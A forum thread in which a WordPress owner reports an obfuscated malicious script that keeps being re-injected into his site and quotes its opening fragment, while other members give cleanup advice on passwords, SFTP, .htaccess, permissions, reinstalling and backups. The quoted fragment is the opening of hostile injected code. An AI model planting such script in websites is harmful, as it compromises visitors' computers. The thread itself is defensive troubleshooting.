This site may harm your computer.

angelo

angelo

New member
Jan 5, 2007
566
1
0
Script Injected to my Site

The script starts with this

<script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a)


I opened up filezilla, downloaded all the files that have been recently updated and found those lines of code. I deleted them and thought that would make it go away. Ill just wait for google to crawl again my site and hopefully the warning message in google would be removed


but!!!!

today I found out that the lines of code are back again! How can I protect my wordpress site from this?

I change the passwords and deleted those lines again but will this solve the problem?
 


Mother fuckers.. I also have a few sites with redirect scripts injected to my htaccess file...
Plan to tackle them this weekend.
 
I actually deleted that lines of code like 5 hours ago and now they're back.
@blogspotter what plugins do you have installed?

i have category post, statcounter, allinoneseopack installed

ive read that plugins cause also cause this. if we have a plugin in common then we can uninstall them.
 
The usual. allinoneseo, tweememe, facebook plugin with that stats, some back up plugin, autolinks, yaarp.. But I don't think it's the plugins.. It's not on all the sites, and I basically use the same plugin list.. Have to check...

Which file did you delete the line of code from?
Have you checked your HTACCESS file?
Have you also checked the Permsissions for the folder?

And change all passwords.. FTP, database, Wp Admin..

Also I only use plugins that are already popular
 
I dealt with this a few months back. I actually couldn't get the problem completely removed just re-installed WP.

But yes change the passwords man as blogspotter suggested and also use sFTP to connect to your server if you can in future.

If they are injecting it, then you more than likely either have

a. compromised passwords giving them access to the server.
b. compromised server giving them access to anyone on the server.
 
Upate WP. Also ensure you are not giving access to the .htaccess and other folders. Just righ click on the file and esnure it's not chkmod to 777. If it is change it to at least 775.

Cleaning out user accounts is always a good idea as well.
 
Force upgrade WP. Change passwords to your account/server. Check server for extra added files (remote exploit), check DB for added tables or modified users table.

Or, just backup your posts, and reinstall the entire thing, including creating a new username/password for everything.
 
Maverick 2.0 said:
You have any backup? If yes, delete the site and start over again.
Click to expand...

This is what I had to do on one of my sites.

It sucks, but sometimes it's the only way. Plus, my technical knowledge on these kind of things is extremely limited.

As far as the 'This Site May Harm Your Computer' warning in google, I believe you can clear this using the webmaster tools. After I cleaned one of my sites, the message disappeared from google in less than 24 hours. But, the damage was done and my traffic just hasn't been the same since. :(
 
A reminder to anyone using wordpress or any other CMS to backup on a regular basis.

I've been putting backing up my sites on the back burner for months now but I'm doing it now.
 
You must log in or register to reply here.
Top Bottom